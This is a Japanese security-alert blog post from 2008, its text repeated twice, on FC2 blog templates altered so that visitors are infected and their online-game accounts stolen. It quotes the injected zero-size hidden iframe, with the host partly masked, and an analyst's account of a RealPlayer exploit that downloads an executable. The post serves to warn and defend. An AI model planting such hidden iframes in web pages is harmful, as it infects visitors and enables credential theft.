テンプレートの改ざんとウイルスサイトへのリンク [news・security_alert]
Date:2008.03/05 [Wed]10:30 | Category:[ニュース]
アルキカタサイトニュースより転載
FFXI:戦士スキーのブログ:テンプレートが書き換えられている!※
FF11 ペット狩り黒猫奮闘記:ウイルス検出について【報告】
某青魔導士のFF11雑記:緊急告知<ブログ改竄>※
先日来、オンラインゲーム(ネットゲーム)のアカウントハックを狙う悪質なスパムの話題をお伝えしてきましたが、今回は、FC2ブログのテンプレートが改ざんされ、そのブログにアクセスしたユーザがウイルス感染、アカウントハックを企てられるという事例です。
上記ブログの管理人さんたちは、テンプレートの中に
HTMLタグリファレンス:<IFRAME>
皆さんがよくご覧になるamazonのアソシエイトリンクなどにもこのタグは使われていますが、今回のケースは、つまり、まったく見えないかたちで、しかしHTML内に確実に存在するという手法が取られています。
このようにすると、ブログを一目見ただけでは、おかしなリンクが張られているということにはまったく気付きません。
上記ブログや関連サイトをあたってみたところ、明確な問題点は次の3つです。
(1)テンプレートの改ざんということで、通常、ブログの管理者にしか行えない行為をなぜ行うことができたのか、ということ。
上記ブログの管理人さんたちがFC2に問い合わせたところ、「推測しやすいパスワードを利用しないように」との回答が返ってきたようで、FC2の問題ではなく個人的にブログの管理画面がハックされたという立場のようです。
※この部分は、後述する様々なサイト(企業サイトを含む)がハックされたことを考えると、システムの脆弱制などそれ以外の理由も可能性として考えられますが、確かなことは明らかではありません。憶測で騒ぐのではなく、「最低限できること」として、「推測しやすいパスワード」は利用しない、を実践することがたいせつです。
FC2ブログ公式マニュアル:パスワードの安全な保管のしかた
@IT:安全性の高いパスワードを作るコツ
(2)<iframe>により、ブログを閲覧すると組み込まれたサイトにアクセスすることになり、そこでウイルスに感染してしまうこと。
これは防ぎようがありません。
対策としては、ブログの管理者は、このような記述をテンプレート内に見かけたら即刻削除すること、閲覧者は、自分のPC内にアンチウイルスソフトをインストールしておくこと、です。
(3)感染したウイルスは、RealPlayerの脆弱制を利用し、PC内のオンラインゲーム(この場合Lineage2のようです)のデータを盗むこと。
「FFXI:戦士スキーのブログ:テンプレートが書き換えられている!」に寄せられた解析人さんのコメントには、こうあります。
引用:
ユーザサイドでできることとしては、
(1)パスワードを推定しにくい、分かりにくいものに変更
(2)自分のテンプレートを定期的に確認
テンプレートのソースをエディタにコピー&ペーストし、「iframe」「width="0"」「width="0"」などのキーワードで全文検索してみると良いでしょう。
(3)オンラインゲームの話題を扱っているブログが狙われるケースが多いので、
ブログ上に「オンラインゲームのユーザ」宛に警告を掲載
(4)万が一該当していたら、テンプレートを修正、読者に周知、パスワード変更
他にもありましたらご教示ください。
なお、「FC2ブログだけが狙われているようなので、FC2ブログ内で何かあったのではないか」という憶測もあるようですが、考えたくないですね。
上記のようにFC2ブログとしては原因は社内にはない、という立場を取っているようですし、一部ブログに書かれているような「FC2ブログだけが狙われている」という認識は誤りです。<iframe>というタグをテンプレート内に埋め込むことができる、自由度の高いブログサービスやレンタルサーバ・自宅サーバのブログが狙われているようです。今回は、その攻撃の矛先がFC2ブログであったようで、冒頭にあげたR-typeさんのブログによれば、今回の改ざんは「3/1(土)の夕方から3/4(火)の早朝」になされたようです。
NOtTE://.org:アカウントハック?!ヽ(´Д`ヽ;)(2007/7/6)
アカウントハック ~その弐~(2007/7/26)
上記の他、「iframe 改ざん」でGoogleで検索すると関連情報が多々あります。
Webページを見ただけでボットに感染
攻撃ツール「MPack」による被害が世界規模で拡大(2007/8/1)
墨猫日記:アカウントハックにご注意ください!(2007/12/28)
結局のところ、自衛手段を強化するしかありません。
アンチウイルスソフトは必須、それ以外にも、危険と思われる行為は回避しましょう。
以下に、オンラインゲームのユーザがまとめたものがあります。
【FF11】アカウント不正ログイン被害まとめ>「被害にあわない為に」
リネージュ資料室:セキュリティ対策
このブログ内の関連記事
FFXI:戦士スキーのブログ:テンプレートが書き換えられている!※
FF11 ペット狩り黒猫奮闘記:ウイルス検出について【報告】
某青魔導士のFF11雑記:緊急告知<ブログ改竄>※
先日来、オンラインゲーム(ネットゲーム)のアカウントハックを狙う悪質なスパムの話題をお伝えしてきましたが、今回は、FC2ブログのテンプレートが改ざんされ、そのブログにアクセスしたユーザがウイルス感染、アカウントハックを企てられるという事例です。
(2008/3/10現在、※のブログは現在プライベートモードに設定されています)
上記ブログの管理人さんたちは、テンプレートの中に
<iframe src="http://www■dda3■net" width="0" height="0"></iframe><iframe>~</iframe>HTMLタグリファレンス:<IFRAME>
皆さんがよくご覧になるamazonのアソシエイトリンクなどにもこのタグは使われていますが、今回のケースは、
width="0" height="0"このようにすると、ブログを一目見ただけでは、おかしなリンクが張られているということにはまったく気付きません。
上記ブログや関連サイトをあたってみたところ、明確な問題点は次の3つです。
(1)テンプレートの改ざんということで、通常、ブログの管理者にしか行えない行為をなぜ行うことができたのか、ということ。
上記ブログの管理人さんたちがFC2に問い合わせたところ、「推測しやすいパスワードを利用しないように」との回答が返ってきたようで、FC2の問題ではなく個人的にブログの管理画面がハックされたという立場のようです。
※この部分は、後述する様々なサイト(企業サイトを含む)がハックされたことを考えると、システムの脆弱制などそれ以外の理由も可能性として考えられますが、確かなことは明らかではありません。憶測で騒ぐのではなく、「最低限できること」として、「推測しやすいパスワード」は利用しない、を実践することがたいせつです。
FC2ブログ公式マニュアル:パスワードの安全な保管のしかた
@IT:安全性の高いパスワードを作るコツ
(2)<iframe>により、ブログを閲覧すると組み込まれたサイトにアクセスすることになり、そこでウイルスに感染してしまうこと。
これは防ぎようがありません。
対策としては、ブログの管理者は、このような記述をテンプレート内に見かけたら即刻削除すること、閲覧者は、自分のPC内にアンチウイルスソフトをインストールしておくこと、です。
(3)感染したウイルスは、RealPlayerの脆弱制を利用し、PC内のオンラインゲーム(この場合Lineage2のようです)のデータを盗むこと。
「FFXI:戦士スキーのブログ:テンプレートが書き換えられている!」に寄せられた解析人さんのコメントには、こうあります。
引用:
dda3が罠サイトです。利用する脆弱性はRealPlayerで、
スクリプトを見る限り多くのバージョンに対応しています。
dda3がダウンロードし実行するのは/sys.exeで、検体をVirusTotalでスキャンしましたが珍しく「全滅」です。
RealPlayerは最新版の11でも「現時点で」大穴が開いており、塞がれていません。アンインストールを推奨します。
バイナリを見る限りLineage2のパス抜きと思われますが、他にも機能はあるかもしれません。
ブログのテンプレート書き換えが「もし」頻発しているなら2つ考えられます。
・FC2本体が(社内の誰かが踏んだなどで)食われた←あまり考えたくない。
・貴殿がどこかで踏んで、それがブログの管理画面のIDとパスを送信した。←ありがち。
[追記]※RealPlayerについては、最新では昨秋に脆弱性が指摘され、その後パッチが公開されたようですが(参考記事#1、#2、#3)、その後のニュースは、インストール時の情報開示が不充分ということで「バッドウェアと認定された」というもののみです。したがって、ここでは、ウェブ上の情報として、上記のようなコメントがされています、と書くに留めます。真偽についてはご自身で判断ください。
ユーザサイドでできることとしては、
(1)パスワードを推定しにくい、分かりにくいものに変更
(2)自分のテンプレートを定期的に確認
テンプレートのソースをエディタにコピー&ペーストし、「iframe」「width="0"」「width="0"」などのキーワードで全文検索してみると良いでしょう。
(3)オンラインゲームの話題を扱っているブログが狙われるケースが多いので、
ブログ上に「オンラインゲームのユーザ」宛に警告を掲載
(4)万が一該当していたら、テンプレートを修正、読者に周知、パスワード変更
他にもありましたらご教示ください。
なお、「FC2ブログだけが狙われているようなので、FC2ブログ内で何かあったのではないか」という憶測もあるようですが、考えたくないですね。
上記のようにFC2ブログとしては原因は社内にはない、という立場を取っているようですし、一部ブログに書かれているような「FC2ブログだけが狙われている」という認識は誤りです。<iframe>というタグをテンプレート内に埋め込むことができる、自由度の高いブログサービスやレンタルサーバ・自宅サーバのブログが狙われているようです。今回は、その攻撃の矛先がFC2ブログであったようで、冒頭にあげたR-typeさんのブログによれば、今回の改ざんは「3/1(土)の夕方から3/4(火)の早朝」になされたようです。
NOtTE://.org:アカウントハック?!ヽ(´Д`ヽ;)(2007/7/6)
アカウントハック ~その弐~(2007/7/26)
上記の他、「iframe 改ざん」でGoogleで検索すると関連情報が多々あります。
Webページを見ただけでボットに感染
攻撃ツール「MPack」による被害が世界規模で拡大(2007/8/1)
墨猫日記:アカウントハックにご注意ください!(2007/12/28)
結局のところ、自衛手段を強化するしかありません。
アンチウイルスソフトは必須、それ以外にも、危険と思われる行為は回避しましょう。
以下に、オンラインゲームのユーザがまとめたものがあります。
【FF11】アカウント不正ログイン被害まとめ>「被害にあわない為に」
リネージュ資料室:セキュリティ対策
このブログ内の関連記事
- 改めて、セキュリティについて (03/07)
- FC2ブログユーザーフォーラムにも、iframe不適切ブログへのリンク [news・security_alert] (03/08)
- アクセスする前にリンク先について知ることのできるサイト (03/08)
スポンサーサイト
管理人のみ閲覧できます